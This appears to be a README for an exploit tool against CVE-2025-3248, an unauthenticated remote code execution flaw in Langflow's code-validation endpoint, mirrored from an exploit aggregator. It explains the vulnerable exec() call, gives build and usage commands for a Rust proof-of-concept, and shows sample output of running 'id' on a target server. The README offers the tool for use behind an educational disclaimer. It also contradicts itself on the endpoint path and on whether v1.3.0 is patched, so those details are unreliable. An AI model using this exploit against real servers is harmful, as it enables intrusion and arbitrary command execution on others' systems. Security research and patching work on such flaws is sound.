Share
## https://sploitus.com/exploit?id=D19A2454-5C10-5EA5-ACA2-55F909BBFD6A
# Langflow RCE Exploit - CVE-2025-3248

> โš ๏ธ **Disclaimer**  
> This code is strictly intended for **educational and research purposes** only. Unauthorized use on systems without explicit permission may constitute a violation of the law.  
> The author is **not responsible** for any misuse or malicious activity involving this tool.

---

## Vulnerability Information

CVE-2025-3248 - Critical

CVSS Score: 9.8 | EPSS Score: 92.57% | Published: May 22, 2025

### **Affected Versions**
- **Vulnerable:** All versions โ‰ค v1.3.0
- **Patched:** Versions v1.3.0+

### **Attack Vector**
The endpoint `/api/v1/validate/code` accepts unsanitized Python code and executes it directly with `exec()`, requiring no authentication.

### **Vulnerable Code**

```python
# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!
```

## Technical Breakdown
Langflow exposes a /api/v1/builder/execute_code endpoint that takes user-supplied Python code and passes it directly to exec() on the backend. Since there's no authentication or sandboxing, attackers can craft arbitrary payloads for code execution.

## Execute exploit 

### Requirements
- Rust 1.70+ (install via rustup)
- Cargo (Rust package manager)

```rust
# Clone repository
git clone 
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
```

```rust
./CVE-2025-3248-POC --url  --command ""
```

### Example:

```rust
โฏ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   
```